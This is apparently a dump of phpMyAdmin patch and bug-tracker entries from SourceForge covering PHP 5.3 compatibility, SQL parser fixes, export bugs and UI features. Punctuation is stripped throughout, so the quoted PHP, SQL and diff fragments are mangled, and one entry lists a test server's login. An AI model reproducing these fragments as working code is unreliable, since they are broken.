It shouldn t display 0 if it doesn t know.
Original URL https sourceforge.net p phpmyadmin patches 431 https sourceforge.net p phpmyadmin patches 431 Original author olafvdspek","bug"
"24444","4379","ereg ) deprecated in PHP 5.3.
PHP 5.3 currently alpha 3, expected release sometime in 2009) will deprecate the ereg ) suite of POSIX regular expression functions, so they must be replaced with preg ) equivalents.
I did a quick search for ereg in the public 3.1.0 english codebase and made the necessary changes.
I have not tested these extensively by any means, but in most cases they were simple replacements and my copy seems to run fine in basic usage on PHP 5.3alpha3.
A few files have comments that refer to ereg ) functions even though ereg ) functions are not actually called in those functions; I ignored these.
A few files build regex patterns using variables from an external source, which I didn t take the time to trace back and analyze for whether they might contain standard preg delimeters ).
In these cases I just wrapped the variable in addcslashes v, ) to escape them.
Attached is my diff, hope its useful.
Original URL https sourceforge.net p phpmyadmin patches 433 https sourceforge.net p phpmyadmin patches 433 Original author atfrase","bug"
"24444","4380","changelog.php linkifies one link wrong.
changelog.php does not fully link one link in the 3.1.1 changelog http phpmyadmin.net auth key is linked only up to http phpmyadmin.net auth.
A patch to fix it phpMyAdmin changelog.php.old Tue Dec 9 12 24 00 2008 phpMyAdmin changelog.php Wed Dec 17 21 42 31 2008 9,7 9,7 changelog = htmlspecialchars file get contents ChangeLog )); replaces = array http [.
a zA Z0 9. ]
[ a zA Z0 9]) \ http [.
a zA Z0 9. ]
[ a zA Z0 9 ]) = gt; lt;a href= \\1 gt;\\1 lt; a gt; , sourceforge users Original URL https sourceforge.net p phpmyadmin patches 434 https sourceforge.net p phpmyadmin patches 434 Original author nneonneo","bug"
"24444","4381","php5.2 warning does not work.
there are hundreds of pages containing Parse error syntax error, unexpected T STRING, expecting T OLD FUNCTION or T FUNCTION or T VAR or \} in .... libraries Error Handler.class.php on line 25 to be found in google, see also https sourceforge.net forum forum.php?thread id=2692135 forum id=72909 and https sourceforge.net forum forum.php?thread id=2620874 forum id=72909 etc.
pma should avoid revealing the path and give a meaningful explanation instead; my simple) suggestion version Id Error Handler.class.php 10738 2007 10 08 16 02 58Z cybot tm if version compare PHP VERSION, 5.2.0 , lt; )) \{ die PHP 5.2 is required!
); \} All the best for 2009, Jxc3xbcrgen Original URL https sourceforge.net p phpmyadmin patches 435 https sourceforge.net p phpmyadmin patches 435 Original author windkiel","bug"
"24444","4382","Wrong string in setup script hints.
I may be crazy here, but it seems to me the string displayed in the setup script as the description for the verbose server name strSetupServers verbose desc) is incorrect seems this text should read more like A user friendly description of this server.
Leave blank for the hostname.
The text provided in that string seems to me to match the server hostname field, which doesn t seem to have a description provided.
Original URL https sourceforge.net p phpmyadmin patches 436 https sourceforge.net p phpmyadmin patches 436 Original author ibennetch","bug"
"24444","4383","obsolete variable.
While browsing through the code I came across the line a rows = in libraries import.lib.php.
While it strictly is not a syntax error, I don t think it has any purpose there.
Original URL https sourceforge.net p phpmyadmin patches 437 https sourceforge.net p phpmyadmin patches 437 Original author helmo","bug"
"24444","4384","MaxExactCountViews.
The prefix and the hint are shown even if the view contains less than MaxExactCountViews rows.
Original URL https sourceforge.net p phpmyadmin patches 449 https sourceforge.net p phpmyadmin patches 449 Original author virsacer","bug"
"24444","4385","Multi row change with ] .
On multi row change PMA gets the SQL error Unclosed quote if unique condition contains ] Example CREATE TABLE test name varchar 255) NOT NULL); INSERT INTO test VALUES ] ); View the table and click Check All then click With selected Change Original URL https sourceforge.net p phpmyadmin patches 439 https sourceforge.net p phpmyadmin patches 439 Original author virsacer","bug"
"24444","4386","server privileges.php cleanup.
There is a problem with the user host seperator when deleting users.
Original URL https sourceforge.net p phpmyadmin patches 441 https sourceforge.net p phpmyadmin patches 441 Original author virsacer","bug"
"24444","4387","Create user for existing database.
While looking at the privileges for a specific database, I was missing the option to create a user for that specific database.
I therefore added the create user link on this page, and included an extra radiobutton to the create user page.
Here is the patch.
A Dutch translation for the added string is included.
The patch also includes an updated comment in db search.php which reused Original URL https sourceforge.net p phpmyadmin patches 442 https sourceforge.net p phpmyadmin patches 442 Original author helmo","bug"
"24444","4388","E DEPRECATED compatibility for PHP 5.3.
Greetings, attached is a patch that should make phpMyAdmin 3.1.2 working on PHP 5.3 alpha3.
I didn t test it on PHP 5.2 but I think it should work.
Original URL https sourceforge.net p phpmyadmin patches 443 https sourceforge.net p phpmyadmin patches 443 Original author themnemonic","bug"
"24444","4389","relation display.
Wrong vars beeing used, I think Original URL https sourceforge.net p phpmyadmin patches 444 https sourceforge.net p phpmyadmin patches 444 Original author virsacer","bug"
"24444","4390","Create user for existing database correction.
The link was only there if there are already users with access to the database.
And it shouldnt be directly in the table.
Original URL https sourceforge.net p phpmyadmin patches 445 https sourceforge.net p phpmyadmin patches 445 Original author virsacer","bug"
"24444","4391","Result sorting.
The check for metadata orgname is wrong so the sort link is incomplete SELECT COUNT ) AS `Rows`, `type` FROM `table` GROUP BY `type` If a query contains an ORDER BY without the table name there are no sort arrows SELECT COUNT ) AS `Rows`, `type` FROM `table` GROUP BY `type` ORDER BY `type` Original URL https sourceforge.net p phpmyadmin patches 446 https sourceforge.net p phpmyadmin patches 446 Original author virsacer","bug"
"24444","4392","Another XHTML fix.
...
Original URL https sourceforge.net p phpmyadmin patches 447 https sourceforge.net p phpmyadmin patches 447 Original author virsacer","bug"
"24444","4393","Polish translation fixes for SVN revision 12300.
Hi, I ve made some fixes in polish translation file on svn file, rev12300), diff file attached.
I ll try make more translation when I find some time ) Original URL https sourceforge.net p phpmyadmin patches 459 https sourceforge.net p phpmyadmin patches 459 Original author zipoking","bug"
"24444","4394","DB comment tooltips not shown on navigation pane.
Hi Everybody, In PMA 3.1.2 comment tooltips of DBs in DB list on left pane not shown because of a syntax error in file .
libraries List Database.class.php on line 284 at column 32) written as db tooltip = db tooltips[ db]; Underscore at column 32 is excessive.
I ve already removed it from my copy of PMA 3.1.2. )
Thanks for your Great Work.
Yours Sincerely, ERDEM Original URL https sourceforge.net p phpmyadmin patches 448 https sourceforge.net p phpmyadmin patches 448 Original author ahard","bug"
"24444","4395","View table headers footers completely.
In some tables the headers footers have elements with no text or image.
So I made them visible and removed the spare spaces in this elements.
Original URL https sourceforge.net p phpmyadmin patches 450 https sourceforge.net p phpmyadmin patches 450 Original author virsacer","bug"
"24444","4396","support column name having square brackets.
Full bug title insert into field like col[a] fails Unknown column) I ve confirmed this bug s behaviour in two places tbl relation.php and tbl change.php Both use the fieldname inside square brackets in a HTML name attribute.
Since according to MySQL a filedname like foo[bar] is allowed I think we should not fail on this.
Also, when other exotic characters are used in a fieldname this may not go well.
But it would certainly violate the html specs.
My solution is to include an extra hidden HTML field containing the fieldname.
A mapping to this can be done using a md5 of the fieldname.
Whenever key is used in tbl replace.php to represent the fieldname explicitly, a mapping is required using me fields name[ key] .
Original URL https sourceforge.net p phpmyadmin patches 451 https sourceforge.net p phpmyadmin patches 451 Original author helmo","bug"
"24444","4397","Langvar for Default values.
The german translation of none depends on the gender.
So there is a need for another langvar.
It was also included in my translation https sourceforge.net tracker2 ?func=detail aid=2538426 group id=23067 atid=387645 but has not been added...
Original URL https sourceforge.net p phpmyadmin patches 452 https sourceforge.net p phpmyadmin patches 452 Original author virsacer","bug"
"24444","4398","missing code with hashing for relationship editing.
you missed to add a few lines when adding the possibility to have closing brackets ]) in column names for relation view.
patch is attached diff git a phpMyAdmin tbl relation.php b phpMyAdmin tbl relation.php index 94f361f..e7743e6 100644 a phpMyAdmin tbl relation.php b phpMyAdmin tbl relation.php 93,10 93,19 if cfgRelation[ displaywork ]) \{ \} u p d a t e s f o r I n t e r n a l r e l a t i o n s me fields name = \ isset REQUEST[ fields name ]) \ ?
REQUEST[ fields name ] \ null; \ if isset destination) cfgRelation[ relwork ]) \{ foreach destination as master field = gt; foreign string) \{ \ foreach destination as master field md5 = gt; foreign string) \{ upd query = false; \ \ Map the fieldname s md5 back to it s real name \ master field = me fields name[ master field md5]; \ if !
empty foreign string)) \{ foreign string = trim foreign string, ` ); list foreign db, foreign table, foreign field) = 138,11 147,6 if isset destination) cfgRelation[ relwork ]) \{ I use sql query to be able to display directly the query via PMA showMessage ) me fields name = isset REQUEST[ fields name ]) ?
REQUEST[ fields name ] null; if isset REQUEST[ destination foreign ])) \{ display query = ; seen error = false; Original URL https sourceforge.net p phpmyadmin patches 453 https sourceforge.net p phpmyadmin patches 453 Original author knittl","bug"
"24444","4399","Optimizations for some PHP loops.
THis patch optimizes PHP loops for faster looping.
I already mailed this patch to the mantainers.
It is patached against revision 12331.
Original URL https sourceforge.net p phpmyadmin patches 464 https sourceforge.net p phpmyadmin patches 464 Original author haeber","bug"
"24444","4400","Detect mcrypt initialization failure.
Based on a question from flyingparchment via IRC I implemented an extra check to see if mcrypt is not only present but also can be initialized.
He presumably had compiled mcrypt without the enable dynamic loading option.
Unfortunately I currently don t have a setup where I can test this.
I would therefore welcome any feedback on security and performance.
When committed, a specific error message might be in place.
Original URL https sourceforge.net p phpmyadmin patches 454 https sourceforge.net p phpmyadmin patches 454 Original author helmo","bug"
"24444","4401","tbl operations shows old AI value.
When changing the autoincrement value in the tbl operations it shows the old value again because it is still in the cache.
Original URL https sourceforge.net p phpmyadmin patches 455 https sourceforge.net p phpmyadmin patches 455 Original author virsacer","bug"
"24444","4402","Fatal error Call to a member function isDisplayed.
The following piece of code, in may cause a fatal error Fatal error Call to a member function isDisplayed ) on a non object in libraries Error Handler.class.php on line 60 foreach this gt; errors as key = gt; error) \{ if !
error gt;isDisplayed )) \{ SESSION[ errors ][ key] = error; \} error may not be an instance of PMA Error but an empty array.
Original URL https sourceforge.net p phpmyadmin patches 456 https sourceforge.net p phpmyadmin patches 456 Original author judas iscariote","bug"
"24444","4403","Add Function Support to display field in pma table info.
I use a foreign key, that results in a user database.
The user database have the columns firstname and surname.
phpMyAdmin can currently only handle single fields .
With this patch, user is able to create a User Defined Function or use a integrated function supported by MySQL eg.
CONCAT surname, ,firstname).
The ToolTip of a foreignkey will now show the full qualified name.
Also the dropdowns and the relation table viewer lists the full qualified name.
I hope this feature will get released for public use.
INSERT INTO `pma table info` `db name`, `table name`, `display field`) VALUES CRM MINI , CRM POSTITS , CONCAT REFERENCE TYPE, ID , REFERENCE ID) ); Cheers, Mike.
Original URL https sourceforge.net p phpmyadmin patches 457 https sourceforge.net p phpmyadmin patches 457 Original author rcrack2k","bug"
"24444","4404","Duplicate sentence in Polish translation.
There is a bug with polish translation of strMysqlLibDiffersServerVersion variable see screen attached) Original URL https sourceforge.net p phpmyadmin patches 458 https sourceforge.net p phpmyadmin patches 458 Original author zipoking","bug"
"24444","4405","Multi row change with ] improved).
I have found a better solution for https sourceforge.net tracker ?func=detail aid=2496403 group id=23067 atid=377410 Plus I moved the trimming of the conditions to PMA getUniqueCondition ) Original URL https sourceforge.net p phpmyadmin patches 468 https sourceforge.net p phpmyadmin patches 468 Original author virsacer","bug"
"24444","4406","changelog.php has another link wrong in 3.1.3.0.
URL http www.phpmyadmin.net old stuff ChangeLogs is parsed as http www.phpmyadmin.net old Original URL https sourceforge.net p phpmyadmin patches 460 https sourceforge.net p phpmyadmin patches 460 Original author pevik","bug"
"24444","4407","CSV Export CRLF Character Removal.
Link to feature request https sourceforge.net tracker ?func=detail aid=2416960 group id=23067 atid=377411 Adds the option to remove CR and LF characters from fields to Excel CSV and regular CSV export modules.
Modified files english utf 8.inc.php csv.php excel.php Original URL https sourceforge.net p phpmyadmin patches 461 https sourceforge.net p phpmyadmin patches 461 Original author drummingds1","bug"
"24444","4408","Fixed truncation of enum set values containing....
When displaying or editing an enum set column having a value that contains parenthesis, the value displayed is truncated at the first closing parenthesis i.e. )
.
Original URL https sourceforge.net p phpmyadmin patches 462 https sourceforge.net p phpmyadmin patches 462 Original author mmoreno","bug"
"24444","4409","Full partial text links big T).
The new Options are quite nice to have but require LOTS of extra clicking Click on Options, check show full texts radiobutton, click on OK. WWouldnt it be easy to have both, the old Full Texts link showing lt; T gt; AND the new Options?
Thanks Original URL https sourceforge.net p phpmyadmin patches 463 https sourceforge.net p phpmyadmin patches 463 Original author nullbarriere","enhancement"
"24444","4410","Server status replication.
The patch brings basic support for MySQL replication.
If the server is configured to work as master or slave or both) in replication process, information about replication are displayed at the bottom of the server status section.
If the server is not configured to work in replication mode, the section is not displayed at all.
Original URL https sourceforge.net p phpmyadmin patches 465 https sourceforge.net p phpmyadmin patches 465 Original author tomassrnka","bug"
"24444","4411","Import upload progress bar feature.
The patch brings progress bar into import section feature request 1330907), if APC or uploadprogress are available on unix machines running Apache mod php.
If JavaScript is not available on client s side, the upload is still working, however no extra information are displayed.
The patch was tested on Apache2 mod php APC works fine), server http alf.intrak.sk t0ms pma Apache2 mod php uploadprogress works fine, but more tests should be done) Apache2 FastCGI APC ISAPI PHP upload information can not be obtained), server http dev.srnka.info TEMP html phpMyAdmin dev IIS7 ISAPI PHP upload information can not be obtained) Username for testing servers is test ; password is testprogress Original URL https sourceforge.net p phpmyadmin patches 472 Original author tomassrnka","bug"
"24444","4412","add index correction for SQL keywords.
Link to feature request http sourceforge.net tracker ?func=detail aid=2724844 group id=23067 atid=377411 The patch adds ` before and after the field s name in ADD INDEX PRIMARY UNIQUE FULLTEXT) query, which is created by Add field .
If there are no ``, the addition of index with a name of any SQL keyword causes SQL error.
Original URL https sourceforge.net p phpmyadmin patches 466 https sourceforge.net p phpmyadmin patches 466 Original author tomassrnka","enhancement"
"24444","4413","XML does not allow spaces in element names.
The XML specification explicitly states that no whitespace is allowed in element names while MySQL allows for whitespace in database, table and column names), as seen here http www.w3schools.com XML xml elements.asp Virtually all XML parsers use whitespace characters in XML element to differentiate between the elements name and any attributes that is possesses.
A name with whitespace interferes with this and disrupts all XML parsers that behave in this way.
Original URL https sourceforge.net p phpmyadmin patches 467 https sourceforge.net p phpmyadmin patches 467 Original author drummingds1","bug"
"24444","4414","Incorrect parsing of constraints in ALTER TABLE.
The SQL parser seems to analyse incorrectly the alter queries designed to add a new foreign key to a table.
After using API to analyse a request as follows parsed sql = PMA SQP parse myQuery); sql info = PMA SQP analyze parsed sql); The sample query is ALTER TABLE `local table2` ADD CONSTRAINT `fk local table foreign table` FOREIGN KEY `foreign table id foreign table`) REFERENCES `foreign table2` `id foreign table`) ON DELETE NO ACTION ON UPDATE NO ACTION; The sql info contains the description of the ALTER, but a dump of the foreign key part outputs [foreign keys] = gt; Array [0] = gt; Array [constraint] = gt; fk local table foreign table [index list] = gt; Array [0] = gt; foreign table id foreign table ) [ref table name] = gt; id foreign table [on delete] = gt; NO ACTION [on update] = gt; NO ACTION ) ) Note that the [ref table name] is the table key, it should contain in fact foreign table2 After analysing the sqlparse.inc.php, I supposed this happens because ALTER queries have one less bracket level compared to CREATE queries.
I tried to correct the script, On line 1758 I added if upper data == ALTER ) \{ seen alter = TRUE; \} On line I 1927 changed if brackets level gt; 0) \{ foreign[ foreign key number][ ref index list ][] = identifier; with if seen alter brackets level gt; 0) \{ foreign[ foreign key number][ ref index list ][] = identifier; \} elseif brackets level gt; 1) \{ foreign[ foreign key number][ ref index list ][] = identifier; Now with the same query I have the following output [foreign keys] = gt; Array [0] = gt; Array [constraint] = gt; fk local table foreign table [index list] = gt; Array [0] = gt; foreign table id foreign table ) [ref table name] = gt; foreign table2 [ref index list] = gt; Array [0] = gt; id foreign table ) [on delete] = gt; NO ACTION [on update] = gt; NO ACTION ) ) Which is correct.
Is it the right way to correct this bug ?
Is the bug due to some mis use of the API ?
Original URL https sourceforge.net p phpmyadmin patches 469 https sourceforge.net p phpmyadmin patches 469 Original author arkhee","bug"
"24444","4415","Invalid Content Encoding header in 3.1.3.1.
This is a patch for bug 2721455 https sourceforge.net tracker ?func=detail aid=2721455 group id=23067 atid=377408) When exporting data as a gzipped file, the export feature would incorrectly add an x gzip content encoding header if PHP output compression was off.
It would also only set the correct content type if output compression was off.
This bug fix Removes the content encoding logic which is managed by PHP anyway) Correctly adds the application x gzip header Adds a condition to avoid redundant double gzipping Removes the need for some special case gzip header logic for Firefox 3 Gecko 1.9 Being new to Sourceforge I m not sure which group you want this in, but I ve tested on Firefox 3, Opera 9 and IE 7 with and without zlib.output compression on.
Original URL https sourceforge.net p phpmyadmin patches 470 https sourceforge.net p phpmyadmin patches 470 Original author abignale","bug"
"24444","4416","Filter of tables displayed for open DB.
Displayed tables in open DB will be filtered by keyword entered in text box Original URL https sourceforge.net p phpmyadmin patches 471 Original author dylfin","bug"
"24444","4417","Export tables into a PHP Array.
This plugin will add the possibility to export tables data and structure) into PHP Arrays.
It will generate the PHP code to fill your PHP associative array.
Just place the file into the plugin directory libraries export Original URL https sourceforge.net p phpmyadmin patches 473 Original author amnsk","bug"
"24444","4418","A fix for bug 2846239.
It seems that double character delimiters weren t supported by the parser.
This patch fixes that by adding one condition to the multiple character punctuation checking part of the parser, requiring it to approve GLOBALS[ sql delimiter ].
Note this only works if you use the Delimiter feature and not if you directly type in the delimiter statement into your SQL statement.)
Also, as the poster fisharebest) mentioned, the code is confusing a String with an array.
Shouldn t the lines 499, 616, and 630 in sqlparser.lib.php contain return sql array instead of return sql ?
I did not add this to the patch, since the consistency of it always showing up near error catching seems like a design choice.
Is it?
Thanks, Thomas Original URL https sourceforge.net p phpmyadmin patches 482 Original author jemajoign","bug"
"24444","4419","realtime SQL syntax highliter using codepress).
Integration of codepress javascript library to enable realtime editable sql syntax highlighted textarea.
Only one phpMyAdmin file changed, at 4 places, adding to about 10 lines.
Original URL https sourceforge.net p phpmyadmin patches 474 Original author ebloemsma","bug"
"24444","4420","Allow selecting a range of rows by holding shift.
It would be nice if one could select a range of checkboxes by using the shoft key.
This is possible in GMail just try it!)
Method Select a checkbox hold shift and select a checkbox 10 rows lower.
All 11 rows should be checked now.
Original URL https sourceforge.net p phpmyadmin patches 475 Original author joolee","bug"
"24444","4421","Bugfix NULL values when exporting as PHP Array.
I discovered a bug in the plugin I recently submitted to export tables as PHP Array see Patch 2805828) NULL values where not correctly dumped.
This patch will correct the problem.
Just place the file into the plugin directory libraries export Regards.
Original URL https sourceforge.net p phpmyadmin patches 476 Original author amnsk","bug"
"24444","4422","Incorrect matching of delimiter keyword.
The SQL parser is matching the word delimiter when it is not being used as a keyword.
Examples include variable names in stored procedures and column names such as my delimiter .
This patch amends the parser to match the delimiter keyword only when not preceded by a character that could form part of an identifier.
Original URL https sourceforge.net p phpmyadmin patches 487 Original author fisharebest","bug"
"24444","4423","Slider effect jumping to top of page.
Hi!
If you have a table with a lot of rows and want to see some details, you jump to the top of the page.
To avoid this, plz change following function PMA generate slider effect [ common.lib.php on line 2405 version Id common.lib.php 12608 2009 06 30 10 48 08Z lem9 ) ] plz change href , to href javascript void 0) , I would appreciate it thx ) Original URL https sourceforge.net p phpmyadmin patches 477 Original author summsel","bug"
"24444","4424","missing auth type in docs example.
in the Quick Install part of the docs, after Or, if you prefer to not be prompted every time you log in lt;?php i=0; i ; cfg[ Servers ][ i][ user ] = root ; cfg[ Servers ][ i][ password ] = cbb74bc ; use here your password pma 3 needs an additional line cfg[ Servers ][ i][ auth type ] = config ; because default is cookie now).
Original URL https sourceforge.net p phpmyadmin patches 478 Original author windkiel","bug"
"24444","4425","Word wrap long lists of enum values.
When an enum contains a long list of values, the display doesn t word wrap, causing the table structure screen to disappear off the right hand side of the screen.
The attached patch inserts spaces, which allows the browser to wrap.
For example enum jan , feb , mar , apr , may , jun , jul , aug , sep , oct , nov , dec ) becomes enum jan , feb , mar , apr , may , jun , jul , aug , sep , oct , nov , dec ) Original URL https sourceforge.net p phpmyadmin patches 490 Original author fisharebest","bug"
"24444","4426","Server status replication notices fix.
The patch fixes two PHP notices in server status section in 3.2.1rc1.
Original URL https sourceforge.net p phpmyadmin patches 479 Original author tomassrnka","bug"
"24444","4427","DB Synchronize Sortorder of Databases.
Sortorder of Databases on Current Server is SCHEMA NAME !?
Should be ASC ...
Original URL https sourceforge.net p phpmyadmin patches 480 Original author virsacer","bug"
"24444","4428","In response to bug 2821833.
Run the patches from phpMyAdmin root directory.
The correct way for dates seems to be like this lt;table table cell office value type= date office date value= 2009 09 10 gt;.
So I added that to ods.php also time).
However, a strange thing is that, if you don t specify a style, nothing seems to display.
I m not quite sure why.
So I ve also specified three non existent styles DateCell, TimeCell, DateTimeCell.
So this is patch 1; mainly it corrects the type from String to Date or Time.
Patch 2 actually defines DateCell, TimeCell, and DateTimeCell.
I thought these were supposed to be defined in styles.xml, so I tried that but with no luck.
So I ve defined them in content.xml instead.
Maybe an expert in OO can help more.
Thomas Original URL https sourceforge.net p phpmyadmin patches 481 Original author jemajoign","bug"
"24444","4429","don t export data of merge table.
patch for bug 2960816 merged tables not exported correctly When exporting a server database table, data of a table of type MRG myISAM is not exported, only the structure is exported.
Original URL https sourceforge.net p phpmyadmin patches 494 Original author ruleant","bug"
"24444","4430","Focus TEXTAREA sql query on click on SQL link.
Patch for rfe 2963310 Focus TEXTAREA sql query on click on SQL link.
https sourceforge.net tracker ?func=detail aid=2963310 group id=23067 atid=377411 Original URL https sourceforge.net p phpmyadmin patches 496 Original author fedushin","bug"
"24444","4431","Fixed table footer Rev 13011) correction.
The Footer is wrong, if server is NOT a replication client...
Original URL https sourceforge.net p phpmyadmin patches 483 Original author virsacer","bug"
"24444","4432","Slow Loading times with large Databases.
We suffer very bad performance when surfing in a database with phpmyadmin 3.2.2 and a mysql 5.0.51a We have a very large DB where some tables have gt; 15 mio rows and the total row count is above 100 Mio.
For the database the Query show table status from .. performs very bad and takes 5 15s.
This query does not only seem to be issued on pages where the information is necessary but also on pages where none of the info retrieved by this query is used.
One example is the normal result page of a query.
We also have noticed that if we kill the query on the mysql server, the page still shows correctly, without any information missing.
So for us there would be 2 points that need to be improved 1\.
Only issue the query when the information really is needed 2\.
Maybe cache the information that is retreived for some time, this info does not change that much Original URL https sourceforge.net p phpmyadmin patches 484 Original author tmsmaster","bug"
"24444","4433","Session Locks.
Only one PHP script can run at a time.
For example, open two tabs.
In the first, run the query SELECT SLEEP 60); Now attempt to do something in the second tab.
Nothing happens until the first query has completed.
This is almost certainly) caused by session locks.
PHP maintains a lock on each session whether file based session storage or otherwise).
This is to prevent two scripts writing to the session store concurrently.
If a script knows that it has finished writing to the SESSION superglobal, it can explicitly release the lock.
This will allow other scripts to run in parallel.
It is possible that PMA is setting session variables after processing potentially lengthy) SQL operations.
If so, it needs to be refactored to set them earlier in the processing.
The fix for this is to add a call to session write close ) at a suitable point, early in the processing.
Original URL https sourceforge.net p phpmyadmin patches 485 Original author fisharebest","bug"
"24444","4434","Status of the bookmark table.
cfg[ Servers ][ i][ bookmarktable ] is missing on the Statuspage chk rel.php Original URL https sourceforge.net p phpmyadmin patches 486 Original author virsacer","bug"
"24444","4435","Missing backquotes on reserved words.
PMA backquote should always check if name is a forbidden word before skipping.
CREATE TABLE `time` test int 10) NOT NULL ) ENGINE=MyISAM; INSERT INTO `time` VALUES 1); Exporting with cfg[ Export ][ sql backquotes ] = FALSE; should return a working INSERT UPDATE REPLACE statement...
Original URL https sourceforge.net p phpmyadmin patches 488 Original author virsacer","bug"
"24444","4436","Slow export when having lots of databases.
When using phpMyAdmin 3.2.4 with lots of bases gt; 6000), it is very slow to export data.
there was already improvement after the fix of bug 2832600 but I found out that a bottleneck was the query of the base collation.
This is done by querying the information schema with a SELECT DEFAULT COLLATION NAME FROM information schema.SCHEMATA WHERE SCHEMA NAME = \ .
PMA sqlAddSlashes db) .
\ LIMIT 1; int the libraries mysql charsets.lib.php file around line 165, whether DisableIS is set to true or not.
I tried to using instead code from an older version that speed up the process if !
GLOBALS[ cfg ][ Server ][ DisableIS ]) \{ return PMA DBI fetch value SELECT DEFAULT COLLATION NAME FROM information schema.SCHEMATA WHERE SCHEMA NAME = \ .
PMA sqlAddSlashes db) .
\ LIMIT 1; ); \} else \{ PMA DBI select db db); return = PMA DBI fetch value SHOW VARIABLES LIKE \ collation database\ , 0, 1); if db !== GLOBALS[ db ]) \{ PMA DBI select db GLOBALS[ db ]); \} return return; \} Original URL https sourceforge.net p phpmyadmin patches 489 Original author shadow walker","bug"
"24444","4437","Enable to use http and https protocol on same time.
phpmyadmin don t use http and https protocol on same time.
This patch support to use http and https protocol on same time.
Original URL https sourceforge.net p phpmyadmin patches 491 Original author joungkyun","bug"
"24444","4438","HTTP Basic Auth Realm name.
This patch allows the realm name to be set via a config file directive if absent, the old behaviour of setting the realm to phpMyAdmin and GLOBALS[ cfg ][ Server ][ verbose ] or GLOBALS[ cfg ][ Server ][ host ] is maintained.
Patch was made againt last stable release.
Original URL https sourceforge.net p phpmyadmin patches 492 Original author haraldj","bug"
"24444","4439","Prefill Copy table to in tbl operations.php.
The Copy table to tablefield is in tbl operations.php after the dot ) is empty.
This field could be pre filled with the tables name, like the move table to) field above it, so that copying sets of tables would be slightly easier.
This would not degrade user experience, since clicking the field would select the pre filled value, typing another name would overwrite the pre filled value.
Patch tbl operations.php old 2010 02 15 22 39 51.554682408 0100 tbl operations.php 2010 02 15 20 22 39.232818721 0100 479,7 479,7 \} end if ?
gt; amp;nbsp; lt;strong gt;.
lt; strong gt; amp;nbsp; lt;input type= text size= 20 name= new name onfocus= this.select ) gt; lt;br gt; \ lt;input type= text size= 20 name= new name onfocus= this.select ) value= lt;?php echo htmlspecialchars GLOBALS[ table ]); ?
gt; gt; lt;br gt; lt;?php choices = array structure = gt; strStrucOnly, Original URL https sourceforge.net p phpmyadmin patches 493 Original author iinl","bug"
"24444","4440","After import also display uploaded filename.
This patch resolve the feature request ID 2958013 after import also list uploaded filename https sourceforge.net tracker index.php?func=detail aid=2958013 group id=23067 atid=377411 Messages provided only in english, dutch and russian.
Original URL https sourceforge.net p phpmyadmin patches 495 Original author anonymous","enhancement"
"24444","4441","Templates Proof of concept with Smarty.
This patch introduces a new file named server databases tpl.php which is the template version of server databases.php.
It uses the Smarty 3.0b8.
This is just a small and unfinished !)
proof of concept.
I will rewrite it using Twig Dwoo.
As SF does not allow files larger than 256k I didn t include the actual Smarty library.
You can obtain it from http www.smarty.net Original URL https sourceforge.net p phpmyadmin patches 519 Original author stroxler","bug"
"24444","4442","colored relations for designer.
I have made some improvements in phpmyadmin designer My Changes based on phpmyadmin pmd scripts version Id move.js 11274 2008 05 14 17 30 33Z lem9 It will draw relation in different color grouped on the primary key.
Original URL https sourceforge.net p phpmyadmin patches 497 Original author greenrover","bug"
"24444","4443","PMA Table isMerge added.
Solves bug 2965095 Name Engine MRG MYISAM different for MySQL 5.1.x and newer) New function PMA Table isMerge ), that checks if a table is of the merge type.
Changes function PMA Table sGetStatusInfo ) added parameter to suppress error message if a property doesn t exist.
parameter switched off by default) replace all current checks for MRG MyISAM in the project by the new isMerge function.
Tested with MySQL 5.1.31 and 5.0.45 Changes based on latest trunk git) Original URL https sourceforge.net p phpmyadmin patches 498 Original author ruleant","bug"
"24444","4444","Foreign fields dropdown should always contain current value.
If foreign field current value is not from list of fetched list of available values, PMA doesn t adds current value to dropdown list, so default value is empty string .
So when saving changes PMA will change that field.
If that type of field is int not null or similar, then this results an error, because empty string is incorrect value.
This diff adds current value if it is not in the list, so it is not changed when saving.
Probably this should be localisable, so adopt this patch as necessary.
Original URL https sourceforge.net p phpmyadmin patches 499 Original author anonymous","bug"
"24444","4445","Upgrade TCPDF ID 2982568.
Currently TCPDF emmits warnings with current PHP, This was fixed by upgrading TCPDF.
Original URL https sourceforge.net p phpmyadmin patches 524 Original author madhuracj","bug"
"24444","4446","Go to Browse page on clicking on Table list.
Patch for rfe 2969370 Go to Browse page on clicking on Table list.
https sourceforge.net tracker ?func=detail aid=2969370 group id=23067 atid=377411 Original URL https sourceforge.net p phpmyadmin patches 500 Original author dougboybhd","bug"
"24444","4447","SET and ENUM editing.
A simple javascript solution to edit the ENUM and SET fields.
When a user click on textfield for entering the ENUM or SET value, a prompt window will pop up.
The the values can be entered separated by commas ,).
User can resize the window according to the size he she want.
After entering the value , it will be stored back to the textfield Similarly the entered values can also be edited.
Original URL https sourceforge.net p phpmyadmin patches 529 Original author kishanthan","bug"
"24444","4448","Jump to Recent table.
Implemented Feature https sourceforge.net tracker ?func=detail aid=2098927 group id=23067 atid=377411 Checks against SQL history for recent tables db.
SQL History has a separate bug filed at https sourceforge.net tracker ?func=detail aid=2973949 group id=23067 atid=377408 PS My first attempt in phpmyadmin in preparation for GSOC.
Original URL https sourceforge.net p phpmyadmin patches 501 Original author techrix","bug"
"24444","4449","new search operators.
patch for Feature Request 1480813 number and text search operators added IN, NOT IN, BETWEEN, NOT BETWEEN Original URL https sourceforge.net p phpmyadmin patches 502 Original author blinkys","bug"
"24444","4450","Go to the upper level after table DROP.
Patch for rfe 2968299 Go to the upper level after table DROP.
https sourceforge.net tracker ?func=detail aid=2968299 group id=23067 atid=377411 Original URL https sourceforge.net p phpmyadmin patches 503 Original author bhdouglass","bug"
"24444","4451","HTTP WWW Authenticate Basic log out fixation.
The patch is change mechanism of HTTP WWW Authenticate Basic log out fixation which is describe into Limitation FAQ 3.1 Modified Files .
libraries auth http.auth.lib.php The mechanism implement with session and redirection to set session variable Original URL https sourceforge.net p phpmyadmin patches 504 Original author razonklnbd","bug"
"24444","4452","Upload progress bar with jQuery.
This fixes the upload progress bar on the import tab.
Original URL https sourceforge.net p phpmyadmin patches 540 Original author bananer","bug"
"24444","4453","Go to the upper level after table DROP.
My solution to the problem stated here https sourceforge.net tracker ?func=detail aid=2968299 group id=23067 atid=377411 The problem is that whenever table is set in REQUEST the link for the table is displayed in the serverinfo div.
And the URL parameters are common for all the tabs Browse , Structure , SQL , ..., Drop .
I decided the neatest way to fix this is to add an option to define additional custom URL parameters for tabs and merge those with the general ones when compiling the URL for the link.
